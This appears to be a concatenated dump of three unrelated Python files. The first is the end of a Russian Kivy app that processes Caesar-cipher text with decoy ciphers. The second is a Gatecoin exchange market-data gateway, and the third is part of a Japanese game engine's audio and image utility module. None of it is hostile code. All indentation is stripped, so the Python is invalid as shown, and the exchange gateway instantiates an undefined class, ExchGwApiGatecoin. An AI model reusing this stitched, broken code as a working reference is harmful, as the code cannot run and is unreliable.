qw=b
if smc>0:
for d in range(kss):
for z in range(len(b)):
for n in range(len(alfaw)):
if b[z]==alfaw[n]:
if n+smc<=len(alfaw)-1:
gl+=alfaw[n+smc]
if n+smc>len(alfaw)-1:
#print(len(b),n)
#print(-1*(len(alfaw)-n)+smc)
gl+=alfaw[-1*(len(alfaw)-n)+smc]
break
b=gl
gl=""
if smc>0:
for d in range(kss):
for z in range(len(b)):
for n in range(len(alfaw)):
if b[z]==alfaw[n]:
if n-smc<=len(alfaw)-1:
gl+=alfaw[n-smc]
if n-smc>len(alfaw)-1:
#print(len(b),n)
#print((len(alfaw)+n)-smc)
gl+=alfaw[(len(alfaw)+n)-smc]
break
b=gl
if self.ghi==False:
self.add_sh_s=0
threading.Thread(target=lambda: os.system('увед 2.py')).start()
print(1111)
else:
print(1116)
threading.Thread(target=lambda: os.system('ош6.py')).start()
else:
print(1115)
threading.Thread(target=lambda: os.system('ош5.py')).start()
else:
print(1114)
threading.Thread(target=lambda: os.system('ош4.py')).start()
else:
print(1113)
threading.Thread(target=lambda: os.system('ошm.py')).start()
except:
print(1112)
threading.Thread(target=lambda: os.system('ош3.py')).start()
def build(self):
self.ghi=0
bl=GridLayout(cols=1, spacing=10, size_hint_y=None)
bl.bind(minimum_height=bl.setter('height'))
self.k=Label(text="Шифр обработанный для передачи в сети интернет сохранится в папке shif for",size_hint_y=None, height=40)
bl.add_widget(self.k)
self.k2=Label(text="shipment.Указанные настройки запомните и заранее обговорите их с получателем шифра",size_hint_y=None, height=40)
bl.add_widget(self.k2)
self.ns=TextInput(size_hint_y=None, height=40)
bl.add_widget(Label(text="сколько составить лживых шифров на каждый реальный"))
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(self.ns)
bl.add_widget(gr)
self.ns1=TextInput(size_hint_y=None, height=40)
bl.add_widget(Label(text="под каким номером из лживых шифров будет находится реальный шифр"))
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(self.ns1)
bl.add_widget(gr)
self.ns2=TextInput(size_hint_y=None, height=40,text="0")
bl.add_widget(Label(text="смещение вариантов шифра как в шифре Цезаря"))
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(self.ns2)
bl.add_widget(gr)
self.ns4=TextInput(size_hint_y=None, height=40,text="0")
bl.add_widget(Label(text="Шифрование обработаного шифра шифром Цезаря введите смещение"))
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(self.ns4)
bl.add_widget(gr)
self.ns5=TextInput(size_hint_y=None, height=40,text="0")
bl.add_widget(Label(text="Количество слоёв шифрования обработаного шифра шифром Цезаря"))
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(self.ns5)
bl.add_widget(gr)
lk=Button(text="Обработать для передачи в сети",size_hint=(0.7,1),on_press=self.obrabot)
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(lk)
bl.add_widget(gr)
bl.add_widget(Label(text="Добавить к каждому варианту шифрования символа случайные символы"))
switch = Switch(size_hint_y=None, height=40)
switch.bind(active=self.callback)
bl.add_widget(switch)
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(Label(text="Количество случайных символов добавленных к каждому варианту шифрования"))
bl.add_widget(gr)
self.add_sh_s=0
self.kah=Label(text=str(self.add_sh_s))
bl.add_widget(self.kah)
gr=GridLayout(cols=2,size_hint_y=None, height=40)
gr.add_widget(Label(text="Количество букв на шифр каждой буквы"))
x=open('Shif/0.txt','r')
z=str(len(x.read()))
x.close()
gr.add_widget(Label(text=z))
bl.add_widget(gr)
bl.add_widget(Label(text="Обработанный шифр"))
self.ns3=TextInput(size_hint_y=None, height=180)
bl.add_widget(self.ns3)
root = ScrollView(size_hint=(1, None), size=(Window.width, Window.height))
root.add_widget(bl)
return root
if __name__=="__main__":
Подготовить_для_передачи_шифр().run()
|
gatecoin.py
|
from bitfeeds.socket.restful import RESTfulApiSocket
from bitfeeds.exchange import ExchangeGateway
from bitfeeds.market import L2Depth, Trade
from bitfeeds.util import Logger
from bitfeeds.instrument import Instrument
from bitfeeds.storage.sql_template import SqlStorageTemplate
import time
import threading
from functools import partial
from datetime import datetime
class GatecoinBroker(RESTfulApiSocket):
"""
Exchange gateway RESTfulApi
"""
def __init__(self):
RESTfulApiSocket.__init__(self)
@classmethod
def get_trade_timestamp_field_name(cls):
return 'transactionTime'
@classmethod
def get_bids_field_name(cls):
return 'bids'
@classmethod
def get_asks_field_name(cls):
return 'asks'
@classmethod
def get_order_book_price_field_name(cls):
return 'price'
@classmethod
def get_order_book_volume_field_name(cls):
return 'volume'
@classmethod
def get_trade_side_field_name(cls):
return 'way'
@classmethod
def get_trade_id_field_name(cls):
return 'transactionId'
@classmethod
def get_trade_price_field_name(cls):
return 'price'
@classmethod
def get_trade_volume_field_name(cls):
return 'quantity'
@classmethod
def get_order_book_link(cls, instmt):
return "https://api.gatecoin.com/Public/MarketDepth/%s" % instmt.get_instmt_code()
@classmethod
def get_trades_link(cls, instmt):
if int(instmt.get_exch_trade_id()) > 0:
return "https://api.gatecoin.com/Public/Transactions/%s?since=%s" % \
(instmt.get_instmt_code(), instmt.get_exch_trade_id())
else:
return "https://api.gatecoin.com/Public/Transactions/%s" % \
(instmt.get_instmt_code())
@classmethod
def parse_l2_depth(cls, instmt, raw):
"""
Parse raw data to L2 depth
:param instmt: Instrument
:param raw: Raw data in JSON
"""
keys = list(raw.keys())
if cls.get_bids_field_name() in keys and \
cls.get_asks_field_name() in keys:
l2_depth = L2Depth()
# Bids
bids = raw[cls.get_bids_field_name()]
bid_level = -1
for bid in bids:
price = bid[cls.get_order_book_price_field_name()]
volume = bid[cls.get_order_book_volume_field_name()]
if bid_level == -1 or l2_depth.bids[bid_level].price != price:
bid_level += 1
if bid_level < 5:
l2_depth.bids[bid_level].price = float(price)
else:
break
l2_depth.bids[bid_level].volume += float(volume)
# Asks
asks = raw[cls.get_asks_field_name()]
ask_level = -1
for ask in asks:
price = ask[cls.get_order_book_price_field_name()]
volume = ask[cls.get_order_book_volume_field_name()]
if ask_level == -1 or l2_depth.asks[ask_level].price != price:
ask_level += 1
if ask_level < 5:
l2_depth.asks[ask_level].price = float(price)
else:
break
l2_depth.asks[ask_level].volume += float(volume)
return l2_depth
else:
raise Exception('Does not contain order book keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
@classmethod
def parse_trade(cls, instmt, raw):
"""
:param instmt: Instrument
:param raw: Raw data in JSON
:return:
"""
trade = Trade()
keys = list(raw.keys())
if cls.get_trade_timestamp_field_name() in keys and \
cls.get_trade_id_field_name() in keys and \
cls.get_trade_price_field_name() in keys and \
cls.get_trade_volume_field_name() in keys:
# Date time
date_time = float(raw[cls.get_trade_timestamp_field_name()])
trade.date_time = datetime.utcfromtimestamp(date_time).strftime("%Y%m%d %H:%M:%S.%f")
# Trade side
trade.trade_side = 1
# Trade id
trade.trade_id = str(raw[cls.get_trade_id_field_name()])
# Trade price
trade.trade_price = float(str(raw[cls.get_trade_price_field_name()]))
# Trade volume
trade.trade_volume = float(str(raw[cls.get_trade_volume_field_name()]))
else:
raise Exception('Does not contain trade keys in instmt %s-%s.\nOriginal:\n%s' % \
(instmt.get_exchange_name(), instmt.get_instmt_name(), \
raw))
return trade
@classmethod
def get_order_book(cls, instmt):
"""
Get order book
:param instmt: Instrument
:return: Object L2Depth
"""
res = cls.request(cls.get_order_book_link(instmt))
if len(res) > 0:
return cls.parse_l2_depth(instmt=instmt,
raw=res)
else:
return None
@classmethod
def get_trades(cls, instmt):
"""
Get trades
:param instmt: Instrument
:param trade_id: Trade id
:return: List of trades
"""
link = cls.get_trades_link(instmt)
res = cls.request(link)
trades = []
if 'transactions' in res.keys():
trades_raw = res['transactions']
if len(trades_raw) > 0:
for t in trades_raw:
trade = cls.parse_trade(instmt=instmt,
raw=t)
trades.append(trade)
return trades
class ExchGwGatecoin(ExchangeGateway):
"""
Exchange gateway
"""
def __init__(self, db_storages):
"""
Constructor
:param db_storage: Database storage
"""
ExchangeGateway.__init__(self, ExchGwApiGatecoin(), db_storages)
@classmethod
def get_exchange_name(cls):
"""
Get exchange name
:return: Exchange name string
"""
return 'Gatecoin'
def get_order_book_worker(self, instmt):
"""
Get order book worker
:param instmt: Instrument
"""
while True:
try:
l2_depth = self.api_socket.get_order_book(instmt)
if l2_depth is not None and l2_depth.is_diff(instmt.get_l2_depth()):
instmt.set_prev_l2_depth(instmt.get_l2_depth())
instmt.set_l2_depth(l2_depth)
instmt.incr_order_book_id()
self.insert_order_book(instmt)
except Exception as e:
Logger.error(self.__class__.__name__, "Error in order book: %s" % e)
time.sleep(1)
def get_trades_worker(self, instmt):
"""
Get order book worker thread
:param instmt: Instrument name
"""
while True:
try:
ret = self.api_socket.get_trades(instmt)
if ret is None or len(ret) == 0:
time.sleep(1)
continue
except Exception as e:
Logger.error(self.__class__.__name__, "Error in trades: %s" % e)
for trade in ret:
assert isinstance(trade.trade_id, str), "trade.trade_id(%s) = %s" % (type(trade.trade_id), trade.trade_id)
assert isinstance(instmt.get_exch_trade_id(), str), \
"instmt.get_exch_trade_id()(%s) = %s" % (type(instmt.get_exch_trade_id()), instmt.get_exch_trade_id())
if int(trade.trade_id) > int(instmt.get_exch_trade_id()):
instmt.set_exch_trade_id(trade.trade_id)
instmt.incr_trade_id()
self.insert_trade(instmt, trade)
# After the first time of getting the trade, indicate the instrument
# is recovered
if not instmt.get_recovered():
instmt.set_recovered(True)
time.sleep(1)
def start(self, instmt):
"""
Start the exchange gateway
:param instmt: Instrument
:return List of threads
"""
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_instmt_snapshot_table_name(self.get_instmt_snapshot_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
self.init_instmt_snapshot_table(instmt)
instmt.set_recovered(False)
t1 = threading.Thread(target=partial(self.get_order_book_worker, instmt))
t1.start()
t2 = threading.Thread(target=partial(self.get_trades_worker, instmt))
t2.start()
return [t1, t2]
if __name__ == '__main__':
Logger.init_log()
exchange_name = 'Gatecoin'
instmt_name = 'BTCHKD'
instmt_code = 'BTCHKD'
instmt = Instrument(exchange_name, instmt_name, instmt_code)
db_storage = SqlStorageTemplate()
exch = ExchGwGatecoin([db_storage])
instmt.set_l2_depth(L2Depth(5))
instmt.set_prev_l2_depth(L2Depth(5))
instmt.set_order_book_table_name(exch.get_order_book_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
instmt.set_trades_table_name(exch.get_trades_table_name(instmt.get_exchange_name(),
instmt.get_instmt_name()))
instmt.set_recovered(False)
# exch.get_order_book_worker(instmt)
exch.get_trades_worker(instmt)
|
util.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import stat
import shutil
import re
import time
import struct
import zipfile
import lhafile
import operator
import threading
import hashlib
import subprocess
import StringIO
import io
import traceback
import datetime
import ctypes
import ctypes.util
import array
import unicodedata
import functools
import webbrowser
import math
import itertools
if sys.platform == "win32":
import win32api
import win32con
import importlib
pythoncom = importlib.import_module("pythoncom")
win32shell = importlib.import_module("win32com.shell.shell")
import win32com.shell.shellcon
import pywintypes
import ctypes.wintypes
import msvcrt
import wx
import wx.lib.agw.aui.tabart
import wx.lib.mixins.listctrl
import wx.richtext
import pygame
import pygame.image
from pygame.locals import KEYDOWN, KEYUP, MOUSEBUTTONDOWN, MOUSEBUTTONUP, USEREVENT
import cw
#-------------------------------------------------------------------------------
# 汎用クラス
#-------------------------------------------------------------------------------
class MusicInterface(object):
def __init__(self, channel, mastervolume):
self.channel = channel
self.path = ""
self.fpath = ""
self.subvolume = 100
self.loopcount = 0
self.movie_scr = None
self.mastervolume = mastervolume
self._winmm = False
self._bass = False
self._movie = None
self.inusecard = False
def update_scale(self):
if self._movie:
self.movie_scr = pygame.Surface(cw.s(self._movie.get_size())).convert()
rect = cw.s(pygame.Rect((0, 0), self._movie.get_size()))
self._movie.set_display(self.movie_scr, rect)
def play(self, path, updatepredata=True, restart=False, inusecard=False, subvolume=100, loopcount=0, fade=0):
if not updatepredata:
# サウンドフォントやスキンの変更等で鳴らし直す場合
subvolume = self.subvolume
loopcount = self.loopcount
self._play(path, updatepredata, restart, inusecard, subvolume, loopcount, fade)
def _play(self, path, updatepredata=True, restart=False, inusecard=False, subvolume=100, loopcount=0, fade=0):
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self._play, path, updatepredata, restart, inusecard, subvolume, loopcount, fade)
return
assert threading.currentThread() == cw.cwpy
if cw.cwpy.ydata and cw.cwpy.is_playingscenario():
cw.cwpy.ydata.changed()
fpath = self.get_path(path, inusecard)
self.path = path
if not cw.bassplayer.is_alivablewithpath(fpath):
return
if cw.cwpy.rsrc:
fpath = cw.cwpy.rsrc.get_filepath(fpath)
if not os.path.isfile(fpath):
self._stop(fade, stopfadeout=False, updatepredata=False)
else:
assert threading.currentThread() == cw.cwpy
if restart or self.fpath <> fpath:
self._stop(fade, stopfadeout=False, updatepredata=False)
self.set_volume()
self._winmm = False
self._bass = False
bgmtype = load_bgm(fpath)
if bgmtype <> -1:
filesize = 0
if os.path.isfile(fpath):
try:
filesize = os.path.getsize(fpath)
except Exception:
cw.util.print_ex()
if bgmtype == 2:
volume = self._get_volumevalue(fpath) * subvolume / 100.0
try:
cw.bassplayer.play_bgm(fpath, volume, loopcount=loopcount, channel=self.channel, fade=fade)
self._bass = True
except Exception:
cw.util.print_ex()
elif bgmtype == 1:
if sys.platform == "win32":
name = "cwbgm_" + str(self.channel)
mciSendStringW = ctypes.windll.winmm.mciSendStringW
mciSendStringW(u'open "%s" alias %s' % (fpath, name), 0, 0, 0)
volume = cw.cwpy.setting.vol_bgm_midi if is_midi(fpath) else cw.cwpy.setting.vol_bgm
volume = int(volume * 1000)
volume = volume * subvolume / 100
mciSendStringW(u"setaudio %s volume to %s" % (name, volume), 0, 0, 0)
mciSendStringW(u"play %s" % (name), 0, 0, 0)
self._winmm = True
elif cw.util.splitext(fpath)[1].lower() in (".mpg", ".mpeg"):
try:
encoding = sys.getfilesystemencoding()
self._movie = pygame.movie.Movie(fpath.encode(encoding))
volume = self._get_volumevalue(fpath) * subvolume / 100.0
self._movie.set_volume(volume)
self.movie_scr = pygame.Surface(cw.s(self._movie.get_size())).convert()
rect = cw.s(pygame.Rect((0, 0), self._movie.get_size()))
self._movie.set_display(self.movie_scr, rect)
self._movie.play()
except Exception:
cw.util.print_ex()
else:
if self.subvolume <> subvolume:
self.subvolume = subvolume
self.set_volume(fade=fade)
else:
self.set_volume()
if self._bass:
# ループ回数は常に設定する
cw.bassplayer.set_bgmloopcount(loopcount, channel=self.channel)
self.fpath = fpath
self.subvolume = subvolume
self.loopcount = loopcount
self.path = path
if updatepredata and cw.cwpy.sdata and cw.cwpy.sdata.pre_battleareadata and cw.cwpy.sdata.pre_battleareadata[1][3] == self.channel:
areaid, bgmpath, battlebgmpath = cw.cwpy.sdata.pre_battleareadata
bgmpath = (path, subvolume, loopcount, self.channel)
cw.cwpy.sdata.pre_battleareadata = (areaid, bgmpath, battlebgmpath)
def stop(self, fade=0):
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self.stop, fade)
return
self._stop(fade=fade, stopfadeout=True, updatepredata=True)
def _stop(self, fade, stopfadeout, updatepredata=True):
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self._stop, fade, stopfadeout)
return
assert threading.currentThread() == cw.cwpy
if cw.bassplayer.is_alivablewithpath(self.fpath):
# フェードアウト中のBGMも停止する必要があるため、
# self._bass == Falseの時も停止処理を行う
cw.bassplayer.stop_bgm(channel=self.channel, fade=fade, stopfadeout=stopfadeout)
self._bass = False
if self._winmm:
name = "cwbgm_" + str(self.channel)
mciSendStringW = ctypes.windll.winmm.mciSendStringW
mciSendStringW(u"stop %s" % (name), 0, 0, 0)
mciSendStringW(u"close %s" % (name), 0, 0, 0)
self._winmm = False
elif self._movie:
assert self.movie_scr
self._movie.stop()
self._movie = None
self.movie_scr = None
remove_soundtempfile("Bgm")
self.fpath = ""
self.path = ""
# pygame.mixer.musicで読み込んだ音楽ファイルを解放する
if cw.cwpy.rsrc:
path = "DefReset"
path = find_resource(join_paths(cw.cwpy.setting.skindir, "Bgm", path), cw.cwpy.rsrc.ext_bgm)
load_bgm(path)
if updatepredata and cw.cwpy.sdata and cw.cwpy.sdata.pre_battleareadata and cw.cwpy.sdata.pre_battleareadata[1][3] == self.channel:
areaid, bgmpath, battlebgmpath = cw.cwpy.sdata.pre_battleareadata
bgmpath = (u"", 100, 0, self.channel)
cw.cwpy.sdata.pre_battleareadata = (areaid, bgmpath, battlebgmpath)
def _get_volumevalue(self, fpath):
if not cw.cwpy.setting.play_bgm:
return 0
if is_midi(fpath):
volume = cw.cwpy.setting.vol_bgm_midi
else:
volume = cw.cwpy.setting.vol_bgm
return volume * self.mastervolume / 100
def set_volume(self, volume=None, fade=0):
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self.set_volume, volume)
return
if volume is None:
volume = self._get_volumevalue(self.fpath)
volume = volume * self.subvolume / 100.0
assert threading.currentThread() == cw.cwpy
if self._bass:
cw.bassplayer.set_bgmvolume(volume, channel=self.channel, fade=fade)
elif self._movie:
self._movie.set_volume(volume)
def set_mastervolume(self, volume):
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self.set_mastervolume, volume)
return
self.mastervolume = volume
self.set_volume()
def get_path(self, path, inusecard=False):
if os.path.isabs(path):
return path
elif inusecard:
path = cw.util.join_yadodir(path)
self.inusecard = True
else:
inusepath = cw.util.get_inusecardmaterialpath(path, cw.M_MSC)
if os.path.isfile(inusepath):
path = inusepath
self.inusecard = True
else:
path = get_materialpath(path, cw.M_MSC)
self.inusecard = False
return path
class SoundInterface(object):
def __init__(self, sound=None, path="", is_midi=False):
self._sound = sound
self._path = path
self.subvolume = 100
self.channel = -1
self._type = -1
self.mastervolume = 0
self._is_midi = is_midi
def copy(self):
sound = SoundInterface()
sound._sound = self._sound
sound._path = self._path
sound.subvolume = self.subvolume
sound.channel = self.channel
sound._type = self._type
sound.mastervolume = self.mastervolume
sound._is_midi = self._is_midi
return sound
def get_path(self):
return self._path
def _play_before(self, from_scenario, channel, fade):
if from_scenario:
if cw.cwpy.lastsound_scenario[channel]:
cw.cwpy.lastsound_scenario[channel]._stop(from_scenario, fade=fade, stopfadeout=False)
cw.cwpy.lastsound_scenario[channel] = None
cw.cwpy.lastsound_scenario[channel] = self
return "Sound"
else:
if cw.cwpy.lastsound_system:
cw.cwpy.lastsound_system._stop(from_scenario, fade=fade, stopfadeout=False)
cw.cwpy.lastsound_system = None
cw.cwpy.lastsound_system = self
return "SystemSound"
def play(self, from_scenario=False, subvolume=100, loopcount=1, channel=0, fade=0):
self._type = -1
self.mastervolume = cw.cwpy.music[0].mastervolume
if self._sound and 0 <= channel and channel < cw.bassplayer.MAX_SOUND_CHANNELS:
self.channel = channel
self.subvolume = subvolume
if cw.cwpy.setting.play_sound:
volume = cw.cwpy.setting.vol_sound_midi if self._is_midi else cw.cwpy.setting.vol_sound
volume = (volume * cw.cwpy.music[0].mastervolume) / 100.0 * subvolume / 100.0
else:
volume = 0
if cw.bassplayer.is_alivablewithpath(self._path):
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self.play, from_scenario, subvolume, loopcount, channel, fade)
return
assert threading.currentThread() == cw.cwpy
tempbasedir = self._play_before(from_scenario, channel, fade)
try:
path = get_soundfilepath(tempbasedir, self._sound)
cw.bassplayer.play_sound(path, volume, from_scenario, loopcount=loopcount, channel=channel, fade=fade)
self._type = 0
except Exception:
cw.util.print_ex()
elif sys.platform == "win32" and isinstance(self._sound, (str, unicode)):
if threading.currentThread() == cw.cwpy:
cw.cwpy.frame.exec_func(self.play, from_scenario, subvolume, loopcount, channel, fade)
return
assert threading.currentThread() <> cw.cwpy
tempbasedir = self._play_before(from_scenario, channel, fade)
if from_scenario:
name = "cwsnd1_" + str(channel)
else:
name = "cwsnd2"
mciSendStringW = ctypes.windll.winmm.mciSendStringW
path = get_soundfilepath(tempbasedir, self._sound)
mciSendStringW(u'open "%s" alias %s' % (path, name), 0, 0, 0)
volume = int(volume * 1000)
mciSendStringW(u"setaudio %s volume to %s" % (name, volume), 0, 0, 0)
mciSendStringW(u"play %s" % (name), 0, 0, 0)
self._type = 1
else:
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self.play, from_scenario, subvolume, loopcount, channel, fade)
return
assert threading.currentThread() == cw.cwpy
tempbasedir = self._play_before(from_scenario, channel, fade)
def stop(self, from_scenario, fade=0):
self._stop(from_scenario, fade=fade, stopfadeout=True)
def _stop(self, from_scenario, fade, stopfadeout):
self.mastervolume = 0
if self._type <> -1 and self._sound and 0 <= self.channel and self.channel < cw.bassplayer.MAX_SOUND_CHANNELS:
if from_scenario:
tempbasedir = "Sound"
else:
tempbasedir = "SystemSound"
if self._type == 0:
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self._stop, from_scenario, fade, stopfadeout)
return
assert threading.currentThread() == cw.cwpy
try:
cw.bassplayer.stop_sound(from_scenario, channel=self.channel, fade=fade, stopfadeout=stopfadeout)
remove_soundtempfile(tempbasedir)
except Exception:
cw.util.print_ex()
elif self._type == 1:
if threading.currentThread() == cw.cwpy:
cw.cwpy.frame.exec_func(self._stop, from_scenario, fade, stopfadeout)
return
assert threading.currentThread() <> cw.cwpy
if from_scenario:
name = "cwsnd1_" + str(self.channel)
else:
name = "cwsnd2"
mciSendStringW = ctypes.windll.winmm.mciSendStringW
mciSendStringW(u"stop %s" % (name), 0, 0, 0)
mciSendStringW(u"close %s" % (name), 0, 0, 0)
remove_soundtempfile(tempbasedir)
else:
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self._stop, from_scenario, fade, stopfadeout)
return
assert threading.currentThread() == cw.cwpy
def _get_volumevalue(self, fpath):
if not cw.cwpy.setting.play_sound:
return 0
if is_midi(fpath):
volume = cw.cwpy.setting.vol_sound_midi
else:
volume = cw.cwpy.setting.vol_sound
return volume * self.mastervolume / 100.0
def set_mastervolume(self, from_scenario, volume):
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self.set_mastervolume, from_scenario, volume)
return
self.mastervolume = volume
self.set_volume(from_scenario)
def set_volume(self, from_scenario, volume=None):
if threading.currentThread() <> cw.cwpy:
cw.cwpy.exec_func(self.set_volume, from_scenario, volume)
return
if self._type == -1:
return
if volume is None:
volume = self._get_volumevalue(self._path)
volume = volume * self.subvolume / 100.0
assert threading.currentThread() == cw.cwpy
if self._type == 0:
cw.bassplayer.set_soundvolume(volume, from_scenario, channel=self.channel, fade=0)
elif self._type == 1:
volume = int(volume * 1000)
mciSendStringW = ctypes.windll.winmm.mciSendStringW
if from_scenario:
name = "cwsnd1_" + str(self.channel)
else:
name = "cwsnd2"
mciSendStringW(u"setaudio %s volume to %s" % (name, volume), 0, 0, 0)
elif self._type == 2:
self._sound.set_volume(volume)
#-------------------------------------------------------------------------------
# 汎用関数
#-------------------------------------------------------------------------------
def init(size_noscale=None, title="", fullscreen=False, soundfonts=None, fullscreensize=(0, 0)):
"""pygame初期化。"""
if sys.platform == "win32":
# FIXME: SDLがWindowsの言語設定に勝手にUSキーボード設定を追加してしまうので
# キーボードレイアウトが増えていた場合に限り除去
# おそらくSDL2では発生しないので、更新した時には以下のコードを取り除けるはず
active = win32api.GetKeyboardLayout(0)
hkls = set()
for hkl in win32api.GetKeyboardLayoutList():
hkls.add(hkl)
pygame.display.init()
for hkl in win32api.GetKeyboardLayoutList():
if not hkl in hkls:
p = ctypes.c_void_p(hkl)
ctypes.windll.user32.UnloadKeyboardLayout(p)
else:
pygame.display.init()
pygame.font.init()
#pygame.joystick.init()
flags = 0
size = cw.s(size_noscale)
if fullscreen:
scr_fullscreen = pygame.display.set_mode(fullscreensize, flags)
scr = pygame.Surface(size).convert()
scr_draw = scr
else:
scr_fullscreen = None
scr = pygame.display.set_mode(cw.wins(size_noscale), flags)
if cw.UP_WIN == cw.UP_SCR:
scr_draw = scr
else:
scr_draw = pygame.Surface(size).convert()
clock = pygame.time.Clock()
if title:
pygame.display.set_caption(title)
pygame.event.set_blocked(None)
pygame.event.set_allowed([KEYDOWN, KEYUP, MOUSEBUTTONDOWN, MOUSEBUTTONUP, USEREVENT])
# BASS Audioを初期化(使用できない事もある)
if soundfonts is None:
soundfonts = [(cw.DEFAULT_SOUNDFONT, True, 100)]
soundfonts = [(sfont[0], sfont[2]/100.0) for sfont in soundfonts if sfont[1]]
cw.bassplayer.init_bass(soundfonts)
return scr, scr_draw, scr_fullscreen, clock
def convert_maskpos(maskpos, width, height):
"""maskposが座標ではなくキーワード"center"または"right"
であった場合、それぞれ画像の中央、右上の座標を返す。
"""
if isinstance(maskpos, str):
if maskpos == "center":
maskpos = (width / 2, height / 2)
elif maskpos == "right":
maskpos = (width - 1, 0)
else:
raise Exception("Invalid maskpos: %s" % (maskpos))
return maskpos
def get_scaledimagepaths(path, can_loaded_scaledimage):
"""(スケーリングされたファイル名, スケール)のlistを返す。
listには1倍スケールを示す(path, 1)が必ず含まれる。
"""
seq = [(path, 1)]
if can_loaded_scaledimage:
spext = os.path.splitext(path)
for scale in cw.SCALE_LIST:
fname = u"%s.x%d%s" % (spext[0], scale, spext[1])
seq.append((fname, scale))
return seq
def copy_scaledimagepaths(frompath, topath, can_loaded_scaledimage):
"""frompathをtopathへコピーする。
その後、ファイル名に".xN"をつけたイメージを探し、
実際に存在するファイルであればコピーする。
"""
shutil.copy2(frompath, topath)
fromspext = os.path.splitext(frompath)
if can_loaded_scaledimage and fromspext[1].lower() in cw.EXTS_IMG:
tospext = os.path.splitext(topath)
for scale in cw.SCALE_LIST:
fname = u"%s.x%d%s" % (fromspext[0], scale, fromspext[1])
fname = cw.cwpy.rsrc.get_filepath(fname)
if os.path.isfile(fname):
fname2 = u"%s.x%d%s" % (tospext[0], scale, tospext[1])
shutil.copy2(fname, fname2)
def remove_scaledimagepaths(fpath, can_loaded_scaledimage, trashbox=False):
"""fpathと共にfpathがスケーリングされたイメージファイルを全て削除する。
"""
if not os.path.isfile(fpath):
return
remove(fpath, trashbox=trashbox)
fpathext = os.path.splitext(fpath)
if can_loaded_scaledimage and fpathext[1].lower() in cw.EXTS_IMG:
for scale in cw.SCALE_LIST:
fname = "%s.x%d%s" % (fpathext[0], scale, fpathext[1])
fname = cw.cwpy.rsrc.get_filepath(fname)
if fname and os.path.isfile(fname):
remove(fname, trashbox=trashbox)
def find_scaledimagepath(path, up_scr, can_loaded_scaledimage, noscale):
"""ファイル名に".xN"をつけたイメージを探して(ファイル名, スケール値)を返す。
例えば"file.bmp"に対する"file.x2.bmp"を探す。
"""
scale = 1
if cw.binary.image.path_is_code(path):
return path, scale
path = cw.util.join_paths(path)
if not noscale and (can_loaded_scaledimage or\
path.startswith(cw.util.join_paths(cw.tempdir, u"ScenarioLog/TempFile") + u"/") or\
path.startswith(cw.util.join_paths(cw.cwpy.skindir, u"Table") + u"/")):
scale = int(math.pow(2, int(math.log(up_scr, 2))))
spext = os.path.splitext(path)
while 2 <= scale:
fname = u"%s.x%d%s" % (spext[0], scale, spext[1])
fname = cw.cwpy.rsrc.get_filepath(fname)
if os.path.isfile(fname):
path = fname
break
scale /= 2
return path, scale
def find_noscalepath(path):
"""pathが"file.x2.bmp"のようなスケール付きイメージのものであれば
".xN"の部分を取り除いて返す。
ただし取り除いた後のファイルが実在しない場合はそのまま返す。
"""
scales = u"|".join(map(lambda s: str(s), cw.SCALE_LIST))
exts = u"|".join(map(lambda s: s.replace(".", "\\."), cw.EXTS_IMG))
result = re.match(u"\\A(.+)\.x(%s)(%s)\\Z" % (scales, exts), path, re.IGNORECASE)
if result:
fpath = result.group(1) + result.group(3)
if os.path.isfile(fpath):
path = fpath
return path
def load_image(path, mask=False, maskpos=(0, 0), f=None, retry=True, isback=False, can_loaded_scaledimage=True,
noscale=False, up_scr=None, use_excache=False):
"""pygame.Surface(読み込めなかった場合はNone)を返す。
path: 画像ファイルのパス。
mask: True時、(0,0)のカラーを透過色に設定する。透過画像の場合は無視される。
"""
#assert threading.currentThread() == cw.cwpy
if cw.cwpy.rsrc:
path = cw.cwpy.rsrc.get_filepath(path)
if up_scr is None:
up_scr = cw.UP_SCR
if use_excache and path:
# JPDC撮影等で更新されたイメージは正式に差し替えが完了するのがイベント終了後となる
# それまではキャッシュを使用する
npath = os.path.normcase(os.path.normpath(os.path.abspath(path)))
if cw.cwpy.sdata and npath in cw.cwpy.sdata.ex_cache:
caches = cw.cwpy.sdata.ex_cache[npath]
data = None
up_scr2 = 1
for i, scale in enumerate(itertools.chain((1,), cw.SCALE_LIST)):
if caches[i]:
data = caches[i]
up_scr2 = scale
if scale == up_scr:
break
up_scr = up_scr2
if data:
f = io.BytesIO(data)
if not f:
path, up_scr = find_scaledimagepath(path, up_scr, can_loaded_scaledimage, noscale)
bmpdepth = 0
try:
if f:
try:
pos = f.tell()
d16 = f.read(16)
isbmp = get_imageext(d16) == ".bmp"
ispng = get_imageext(d16) == ".png"
isgif = get_imageext(d16) == ".gif"
isjpg = get_imageext(d16) == ".jpg"
f.seek(pos)
image = pygame.image.load(f, "")
except:
image = pygame.image.load(f, path)
elif cw.binary.image.path_is_code(path):
data = cw.binary.image.code_to_data(path)
ext = get_imageext(data)
isbmp = ext == ".bmp"
ispng = ext == ".png"
isgif = ext == ".gif"
isjpg = ext == ".jpg"
if ext == ".bmp":
data = cw.image.patch_rle4bitmap(data)
bmpdepth = cw.image.get_bmpdepth(data)
